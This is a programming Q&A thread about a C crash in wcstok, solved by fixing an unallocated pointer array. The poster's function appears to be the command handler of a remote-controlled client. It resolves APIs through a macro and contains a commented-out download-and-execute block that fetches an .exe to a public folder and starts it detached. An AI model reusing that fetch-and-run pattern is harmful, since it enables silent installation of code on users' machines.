# Code (C) won't work when I remove junk code?

Tags: c, split

I have the following code. The code reads a string from a PHP webpage, then converts the code using the MultiByteToWideChar-function. Then it splits the string using the comma-delimiter. It then removes the "xxx=" before the value (for example, "cid={abcd-1234-5678},tid=AAD23HKJD23KVAAAHN23") and attaches the splitted substrings to an array. Then it displays the parameters one by one in a textbox.

I had it working, however I reinstalled my system 2 days ago and since then I cannot seem to get it working again (even though I backed up the working project before reinstalling, which leaves me wondering how this could ever be possible).

So I have been trying for hours and hours and hours the past day, changing every setting in the compiler and project properties I could think of, reinstalling Visual Studio, trying other versions of Visual Studio, installing extra SDK packages... Nothing helped. Then I added some junk code to test whether the wcstok function was even working (it seems that the project died there) and then randomly the entire project worked and the array I talked about before got properly returned. However, if I remove this junkcode or the code after the splitting/returning of the string (which should have no influence on the code above it, leaving me as confused as I could possibly be) it stops working again and seems to die at the "wcstok"-function.

This is my code:

```
BOOL Commands(LPBYTE command, DWORD size)
{

unsigned int sizeint;
sizeint = (unsigned int)size;
wchar_t params[MAXCHAR];

MultiByteToWideChar(CP_ACP, MB_COMPOSITE, (LPCCH)command, sizeint, (LPWSTR)params, size); 
MessageBoxW(0, params, 0, 0);

//wchar_t input[100] = L"A bird came down the walk";
//wchar_t* buffer;
//wchar_t* token = std::wcstok(input, L" ", &buffer);

wchar_t buf2[MAXCHAR], *ptr;
int i;

for (ptr = wcstok(params, L","); ptr != NULL; ptr = wcstok(NULL, L","))
{
    CWA(lstrcpyW, kernel32, buf2, ptr);
    for (i = 0; i < lstrlenW(buf2); i++)
    {

        if (buf2[i] == '=' )
        {
            wchar_t *a[1000];
            wcscpy(a[0] + i, buf2 + i + 1);
            MessageBoxW(0, a[0] + i, 0, 0);

        }

        else
        {
        }

    }

}

//HRESULT hr;
//LPCTSTR Url = _T("http://cplusplus.com/img/cpp-logo.png"), File = _T("C:\\Users\\Public\\file.exe");
//////hr = URLDownloadToFile(0, Url, File, 0, 0);
//switch (hr)
//{
//  PROCESS_INFORMATION *piinfo; //size = 0x10
//  STARTUPINFO *siinfo;         //size = 0x44
//  CWA(CreateProcessW, kernel32, 0, File, 0, 0, 0, DETACHED_PROCESS, 0, 0, siinfo, piinfo);
//}


CWA(Sleep, kernel32, 100);
return 1;
}
```

It doesn't work properly when I use the code above, but when I uncomment the junk-code that is commented above, it randomly does work. The first "MessageBoxW" seems to always return the string from the PHP page properly, however once I remove the junkcode, the program gets terminated once the wcstok in the splitting function is reached.

It worked before exactly like this and I am honestly clueless, I hope anyone has an idea what could cause this because it is honestly driving me nuts..

Thanks a lot in advance!

Comment: Are you getting warnings? You seem to be passing in only two params to wcstok, so the required third parameter isn’t being set. That should only be possible if you have a bad function definition, e.g. you didn’t include the right header file. You should be getting warnings for that - listen to your compiler!

Comment: `wcscpy(a[0] + i, buf2 + i + 1);` - This is writing into invalid memory

Comment: Code working randomly is a sign of *undefined behavior*.

Comment: I am not getting any errors. I think nneonneo is confusing wcstok and wcstok_s (wcstok only requires 2 arguments). Millie Smith, could you please explain me how it should be done otherwise? Because it worked before but I completely lost it atm

Comment: Your definition of `a` is 1000 `wchar_t` pointers. That should give you enough information to fix it.

Comment: Millie Smith you don't know how happy you made me just now. Thank you a lot! :-) It works well now. I still wonder how that undefined behaviour worked though, didn't know such a thing was possible. Thanks all of you!

Answer (score 0):

Millie Smith was the one who gave me the place where the code was bugged.

Instead of defining "a" as a wchar_t*, I had to define it as a normal w_char.
So it became "wchar_t a[MAXCHAR]". Then I had to change the "wcscpy(a[0] + i, buf2 + i + 1);" inside the splitting function into "wcscpy(a + i, buf2 + i + 1);".

Learned something new again, undefined behaviour can be a tricky thing. 
Thanks for the help and have a nice day!